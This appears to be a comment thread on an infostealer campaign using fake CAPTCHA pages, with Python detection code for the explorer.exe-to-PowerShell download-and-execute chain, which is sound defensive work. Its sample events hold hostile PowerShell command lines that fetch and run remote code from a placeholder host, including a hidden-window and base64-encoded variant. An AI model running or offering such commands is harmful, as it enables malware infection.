The persistent infostealer's latest campaign inserts fake CAPTCHA pages into legitimate applications, fooling users into executing the payload, researchers find.
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
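The process chain the commenter describes (explorer.exe in the user's context spawning PowerShell with an Invoke-WebRequest piped into Invoke-Expression / iex, with no intermediate .lnk or .js) is easy to turn into a detection. The block below is an added example, not code from the commenter or from the article's researchers. It runs over constructed Sysmon-style process-creation records (ParentImage, Image, CommandLine are assumed field names; the URLs are placeholders), and it goes a little beyond the comment: it also matches the built-in aliases (iwr, iex), the parenthesised `iex (iwr ...)` form, pwsh.exe, and the same command hidden behind -EncodedCommand (base64 of UTF-16LE), which is the usual way this string is kept out of a plain command-line match.

```python
import base64
import re
from typing import Optional

# Constructed Sysmon-style process-creation events (Event ID 1 fields).
# Not real telemetry; hosts/URLs are placeholders.
SAMPLE_EVENTS = [
    {   # exactly the chain described above: explorer -> powershell, iwr piped to iex
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -w hidden -c "iwr http://c2.invalid/p | iex"',
    },
    {   # long-form cmdlet names, parenthesised instead of piped
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Invoke-Expression (Invoke-WebRequest http://c2.invalid/p).Content",
    },
    {   # same payload hidden behind -EncodedCommand (base64 of UTF-16LE)
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -ep bypass -enc "
        + base64.b64encode("iwr http://c2.invalid/p | iex".encode("utf-16-le")).decode(),
    },
    {   # benign: a user opens PowerShell from Explorer and runs an ordinary cmdlet
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile Get-Process",
    },
    {   # download-and-execute, but not from explorer.exe: out of scope for this rule
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -c "iwr http://c2.invalid/p | iex"',
    },
]

# Invoke-WebRequest (alias iwr) feeding Invoke-Expression (alias iex), either
# via a pipe or as a parenthesised argument. Case-insensitive: PowerShell is.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:invoke-webrequest|iwr)\b.*?\|\s*(?:invoke-expression|iex)\b"
    r"|\b(?:invoke-expression|iex)\b\s*\(\s*(?:invoke-webrequest|iwr)\b",
    re.IGNORECASE,
)

# -e, -ec, -enc, -encodedcommand all select the encoded-command switch;
# the argument is base64 text.
ENCODED_SWITCH = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# PowerShell hosts worth matching as the child process.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if there is none."""
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64-encoding it.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify(event: dict) -> Optional[str]:
    """Return a reason string if the event matches the explorer -> PowerShell
    download-and-execute chain, else None."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return None
    if basename(event["Image"]) not in POWERSHELL_IMAGES:
        return None
    cmd = event["CommandLine"]
    if DOWNLOAD_EXEC.search(cmd):
        return "download-and-execute in plain command line"
    decoded = decoded_command(cmd)
    if decoded and DOWNLOAD_EXEC.search(decoded):
        return "download-and-execute inside -EncodedCommand"
    return None


def scan(events: list) -> list:
    """Indices and reasons for every event the rule fires on."""
    return [(i, reason) for i, e in enumerate(events) if (reason := classify(e))]


if __name__ == "__main__":
    for i, reason in scan(SAMPLE_EVENTS):
        print(f"event {i}: {reason}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

The parent-process check is what keeps this rule quiet on ordinary admin use; the last sample event shows the same command line under a different parent, which this rule deliberately ignores and which would belong to a separate, broader rule on iwr|iex in any PowerShell command line.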